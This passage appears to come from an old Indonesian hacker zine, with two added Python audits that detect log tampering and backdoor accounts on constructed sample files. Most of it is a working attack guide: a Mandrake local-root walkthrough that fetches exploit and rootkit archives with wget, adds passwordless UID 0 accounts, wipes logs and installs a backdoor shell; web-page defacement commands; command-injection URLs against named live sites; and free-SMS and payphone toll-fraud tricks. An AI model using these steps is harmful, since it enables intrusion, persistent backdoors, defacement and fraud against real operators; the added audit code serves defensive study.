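    "var/log/wtmp", "var/log/lastlog", "var/log/messages", "var/log/secure",
    "var/log/maillog", "var/log/xferlog", "var/run/utmp",
]
HISTORY_FILES = ["root/.bash_history", ".bash_history"]

Finding = Tuple[str, str]  # (relative path, what was found)


def check_log_tampering(root: str) -> List[Finding]:
    """Report logs that are missing, symlinked or truncated, and history sinks."""
    findings: List[Finding] = []
    for rel in LOG_FILES:
        path = os.path.join(root, rel)
        if not os.path.lexists(path):
            findings.append((rel, "missing"))
        elif os.path.islink(path):
            findings.append((rel, f"symlink to {os.readlink(path)}"))
        elif os.path.getsize(path) <= 1:
            # 0 bytes: rm + touch / cat > file; 1 byte: echo > file (a newline).
            findings.append((rel, "truncated (0 or 1 bytes)"))
    for rel in HISTORY_FILES:
        path = os.path.join(root, rel)
        if os.path.islink(path) and os.readlink(path) == "/dev/null":
            findings.append((rel, "history redirected to /dev/null"))
    return findings


def build_fixture() -> str:
    """Constructed tree: healthy logs plus the exact states the tricks leave."""
    root = tempfile.mkdtemp(prefix="logaudit-")
    for sub in ("var/log", "var/run", "root"):
        os.makedirs(os.path.join(root, sub))
    for rel in ("var/log/secure", "var/log/maillog", "var/log/xferlog", "var/run/utmp"):
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(b"\x00" * 384)                      # untouched logs carry data
    with open(os.path.join(root, "var/log/wtmp"), "wb") as fh:
        fh.write(b"\n")                                   # echo >/var/log/wtmp
    open(os.path.join(root, "var/log/messages"), "wb").close()  # rm + touch
    open(os.path.join(root, "var/log/lastlog"), "wb").close()   # cat > lastlog, ctrl-d
    os.symlink("/dev/null", os.path.join(root, "root/.bash_history"))
    return root


def flagged_paths(root: str) -> List[str]:
    """Just the paths, for a quick summary or for assertions."""
    return [rel for rel, _ in check_log_tampering(root)]


if __name__ == "__main__":
    fixture = build_fixture()
    for rel, what in check_log_tampering(fixture):
        print(f"/{rel}: {what}")
```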
: LOCAL ROOT MANDRAKE :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd /tmp ; mkdir " " ; cd " "
1. wget www.geocities.com/lifron/local.tar.gz
2. tar -zxvf local.tar.gz
3. cd local
4. ./lconfex -p
5. ./lconfex -f
6. ./handy.sh 0xbffff625 0xbffff5f1
7. mkdir segfault.eng ; touch segfault.eng/segfault.eng
8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
9. id
10. root
11. /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /home/.kuntua
12. echo "tondano::0:0::/.tondano:/bin/bash" >> /etc/passwd
passwd -d kuntua
Changing password for user kuntua
Removing password for user kuntua
passwd: Success
13. Log in to the shell, then clean the logs and install the backdoor
14. last |grep kuntua
15. su tondano
16. wget http//www.geocities.com/lifron/remove.c
17. gcc -o r remove.c -DGENERIC
18. ./remove /home/kuntus
19. wget www.geocities.com/lifron/shv4.tar.gz
20. tar -zxvf shv4.tar.gz
21. cd shv4
22. ./setup pass port, e.g. ./setup gohanz 7788
23. /usr/sbin/userdel -r kuntua
24. cd /var/tmp/" " <== Clean up all tools
25. Test the shell on port 7788, login as: root, password: gohanz
=================================================================================================
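The account tricks repeated across these sections (useradd with -u 0 and -d /, a line echoed straight into /etc/passwd, passwd -d, home directories hidden under /etc or as dot-directories) all leave traces in /etc/passwd and /etc/shadow. The audit below is an added defender-side example, not part of the original zine; it runs on constructed sample files that mirror those commands, and on a host under review the two real files would be read instead.

```python
"""Audit /etc/passwd and /etc/shadow for the account tricks shown above.

Added example, not from the original zine. SAMPLE_PASSWD and SAMPLE_SHADOW are
constructed to mirror the commands on this page: useradd ... -u 0 -d /,
echo "name::0:0::/.name:/bin/bash" >> /etc/passwd, passwd -d name, and
useradd ... -d /etc/.name.
"""
from typing import Dict, List, Tuple

# Constructed sample /etc/passwd after the tricks above have been applied.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
kuntua:x:501:10::/etc/.kuntua:/bin/bash
bash:x:0:0::/:/bin/bash
tondano::0:0::/.tondano:/bin/bash
"""

# Constructed sample /etc/shadow: "passwd -d" leaves the hash field empty.
SAMPLE_SHADOW = """\
root:$1$saltsalt$placeholderhashvalue:12345:0:99999:7:::
bin:*:12345:0:99999:7:::
kuntua::12345:0:99999:7:::
bash::12345:0:99999:7:::
"""

Finding = Tuple[str, str]  # (account name, what was found)


def parse_colon_file(text: str) -> List[List[str]]:
    """Split a colon-separated account file into field lists.

    Blank lines and comments are skipped; the field count is not enforced
    here so that malformed, hand-edited lines still reach the audit.
    """
    rows: List[List[str]] = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            rows.append(line.split(":"))
    return rows


def suspicious_home(home: str) -> bool:
    """Home directories the tricks above use: /, under /etc, or a dot-dir."""
    return home == "/" or home.startswith("/etc/") or "/." in home


def audit_accounts(passwd_text: str, shadow_text: str) -> List[Finding]:
    """Return one finding per indicator; an account may produce several."""
    findings: List[Finding] = []
    shadow_hash: Dict[str, str] = {
        row[0]: row[1] for row in parse_colon_file(shadow_text) if len(row) >= 2
    }
    for row in parse_colon_file(passwd_text):
        if len(row) != 7:
            findings.append((row[0], "malformed /etc/passwd line"))
            continue
        name, pw_field, uid, gid, _gecos, home, _shell = row
        if uid == "0" and name != "root":
            findings.append((name, "extra UID 0 account"))
        if gid == "0" and name != "root":
            findings.append((name, "primary group is GID 0"))
        if pw_field == "":
            # A line appended with echo >> /etc/passwd: no password at all.
            findings.append((name, "empty password field in /etc/passwd"))
        if shadow_hash.get(name, "*") == "":
            # passwd -d: the account exists in shadow but has no hash.
            findings.append((name, "empty hash in /etc/shadow (passwd -d)"))
        if suspicious_home(home):
            findings.append((name, f"suspicious home directory {home}"))
    return findings


def flagged_accounts(passwd_text: str, shadow_text: str) -> List[str]:
    """Distinct account names that produced at least one finding, in order."""
    seen: List[str] = []
    for name, _ in audit_accounts(passwd_text, shadow_text):
        if name not in seen:
            seen.append(name)
    return seen


if __name__ == "__main__":
    for account, what in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{account:10s} {what}")
```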
find index.html
whereis index.html
locate index.html
default :
cd /var/www/html
echo "KuNTuA ToNDaNo Was Here" > index.html
=================================================================================================
cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo "KuNTuA ToNDaNo Was Here" > mnc.html
to test it:
http://IP-you-hacked/~apache
------------------------------------------------------------------------------------
from: my friends

Holes in CGI

usually the weakness lies in a hole in a .cgi file
we come across many of them
let's get straight to it, ok:

1. Open google.com
2. allinurl:cgi/*.txt
3. wow, so many of them hihihihi
4. Now try to look for the ones ending in *.txt
5. For example:

http://www.indiabook.com/cgi-bin/text/text.cgi?ads1.txt|id|
http://www.monhabitat.net/cgi-bin/ad.cgi?pied1.txt|id|
http://www.submitshop.com/cgi-bin/text/text.cgi?ads2.txt|id;uname;pwd|
http://www.photoserviceltee.com/cgi-bin/includer/includer.cgi?preload_img.txt|id;uname;pwd|

TELKOMSEL 10-CODE SMS BUG

AUTHOR: YUDHAX

IN THE PREVIOUS EDITION I EXPLAINED AND DESCRIBED HOW TO USE AND EXPLOIT THE SMS BUG ON SATELINDO GSM.
THIS TIME WE WILL SWITCH THE GAME TO SATELINDO'S OWN RIVAL .... TELKOMSEL GSM

The GSM SYSTEM, which uses a switching technique built on a base station system, allows us to send short alphanumeric messages from one handset to another, which in fact transmits encrypted data that can be detected by the destination handset/number. In this respect almost all of the facilities developed for GSM have no very complicated differences; one could even say they are ALMOST THE SAME. The only thing is that SATELINDO has now patched its SMS transfer system against the "OLD" trick (which I can in fact still get through with a new trick ..sorry, I will cover Satelindo's new bug some other day...). My compliments to SATELINDO, which has made many changes to its SMS delivery system and uses new serials :-) .


This time the free SMS bug on TELKOMSEL uses a trick resembling the old SATELINDO BUG,
namely the 10-number code of the TELKOMSEL product serial number cards, among them:
series 226****** which means +6281226***** (a Jakarta number)
the buggy card codes are 260**** to 269**** with the 0812- head
which means we can send free sms to SIMPATI numbers in the 081226***** series :-)
note 1: the * code above stands for any number (or all serial numbers of active simpati cards)
note 2: can only be done with a telkomsel simcard

cara sebagai berikut:

1. ketik SMS
2. kirim kenomor yang dituju ( misal: +6281226378** )
(yang saya dapatkan yaitu bug terlkomsel simcard versi 2260**** s/d 2269**** <- diambil dari kode kartu dan
nomor awal dari kartu mentari tersebut) 10 CODE = 2260,2261,2262,2263,2264,2265,2266,2267,2268,2269
3. cara tulis nomor yang dituju menjadi 226378** (coba dgn nomor lain bila perlu)
4. tidak menggunakan karakter apapun yang ditambah pada nomor tujuan (karakter
bintang hanya untuk menutupi nomor asli yang dituju.
4. dapat kita liat bahwa sms kita terkirim.
5. finish

From there we can do as much as we like.

The author APOLOGIZES TO:

1. THOSE INVOLVED WITH THE SMS SYSTEM OF TELKOMSEL AND ALL INDONESIAN GSM OPERATORS
2. ALL PARTIES WHO FEEL HARMED
3. EVERYONE WHO READS THIS AND THEN TAKES OFFENCE.

REGARDS FROM THE AUTHOR

---- YUDHAX --------

MAY THE ONE ABOVE ALWAYS GRANT MORE KNOWLEDGE TO ALL OF OUR PEOPLE.

===== FREE PHONE CALL TRICKS =====

First of all, apologies if this article harms many parties.
There are so many tricks for being CLEVER about communicating,
especially when it comes to communicating for FREE. right....

I won't waste any more words on this.

I. Free local (within-city) call trick

Facilities and method used:
1. A coin payphone that is still working
2. Dial 1551 <--- note: hold the last 1 down
until you hear a "tut/beep/other break tone"
3. Once that tone has sounded, dial the number you want (a local
phone number)
4. and you will get a direct connection from Telkom to the number
you dialled, so you can talk to your lips' content.

note: LOCAL NUMBERS THAT CANNOT BE REACHED ARE USUALLY BECAUSE:
1. TOO MANY REPEATED DIGITS
2. TOO MANY LARGE DIGITS DOMINATING, E.G. 8997896/89868789/ etc
3. THE DESTINATION PHONE IS NOT YET INSTALLED
4. TELKOM IS HAVING TROUBLE :))

II. FREE LONG-DISTANCE (OUT-OF-TOWN) CALL TRICK

Facilities and method used:
1. A home phone, office phone or type B wartel (phone kiosk) (strongly recommended)
2. Call a LONG-DISTANCE DESTINATION NUMBER just as you normally
would (out-of-town only)
3. Talk to your heart's content until your lips swell
4. When the conversation is over ... NOTE THIS TRICK:

TRICK 1. - BEFORE YOU HANG UP, KEY IN THE DESTINATION NUMBER EXACTLY
AS THE NUMBER YOU FIRST DIALLED
e.g.: destination 021888555000 -> when finished, key in
021888555000 again
DO NOT USE THE REDIAL BUTTON, AS IT OFTEN FAILS

TRICK 2. - SAME AS THE FIRST TRICK, BUT WE CHANGE THE FINAL
DESTINATION NUMBER
e.g.: destination 021888555000 -> when finished, key in
031545552222 (A DIFFERENT DESTINATION NUMBER)
DO NOT USE THE REDIAL BUTTON, AS IT OFTEN FAILS


NOTE: BE CAREFUL DOING THIS, BECAUSE IT IS VERY DAMAGING TO OTHER PARTIES.
NEVER USE A TYPE A WARTEL FOR TRICK II (FREE LONG-DISTANCE
CALLS), BECAUSE IT WILL SHOW UP ON THE OPERATOR'S BILLING
COMPUTER AND YOU WILL CERTAINLY BE SUSPECTED, SINCE THE CALL CREDIT WILL
SIMPLY VANISH FROM THE WARTEL OPERATOR'S MONITOR.
DON'T USE THIS TRICK TOO OFTEN, BECAUSE IT WILL HARM "OTHER PARTIES" =))

THAT'S IT FOR THIS TRICK FOR NOW .. SOME OTHER TIME WE'LL PUT TOGETHER A NEW, EVEN MORE
SENSATIONAL TRICK :)) SWEET GREETINGS TO ALL FRIENDS IN CYBERSPACE #aikmel #e-c-h-o #postgres
#hackercrew (because I am only a part of you)

-=+> YUDHAX was here <+=-

== SATELINDO SMS BUG ==

SMS technology is indeed more and more widespread these days, all the more so with
the economy in a shambles; SMS is the more sensible solution compared with phone calls,
which really tear a hole in your pocket. GSM, which uses a switching technique built on
a system of base stations, lets us send a short alphanumeric message from one handset
to another. okay, let's end the preamble here.

Why has the free SMS that was once so popular now become hard to find?
That is a very common question that springs to mind for all of us who rely on
a product promotion that eventually turns commercial. The bug I found at the
end of this month is a free SMS that exploits a weakness in SATELINDO GSM.
Why Satelindo? The new numbers issued by SATELINDO with the leading
series 163*** (e.g. +6281616378**) have a bug that we can take advantage of
to SMS the user for free. It has been tried from Simpati, Mentari, proXL,
etc. and can still be done for free.

the procedure is as follows:
1. type the SMS
2. send it to the destination number (e.g.: +6281616378** - without the asterisks)
(what I found is the Mentari bug for version 6163 <- taken from the card code and
the leading digits of that Mentari card)
3. write the destination number as 616378** (try another number if necessary)
4. do not add any characters to the destination number (the asterisks
only hide the real destination number)
5. we can see that our SMS has been sent.
6. finish

From there we can do as much as we like.

The author APOLOGIZES TO:
1. THOSE INVOLVED WITH THE SMS SYSTEM OF SATELINDO
2. ALL PARTIES INSPIRED TO TRY THIS EXPERIMENT
3. EVERYONE WHO READS THIS AND THEN TAKES OFFENCE.

REGARDS FROM THE AUTHOR

---- YUDHAX --------

MAY THE ONE ABOVE ALWAYS GRANT MORE KNOWLEDGE TO ALL OF OUR PEOPLE.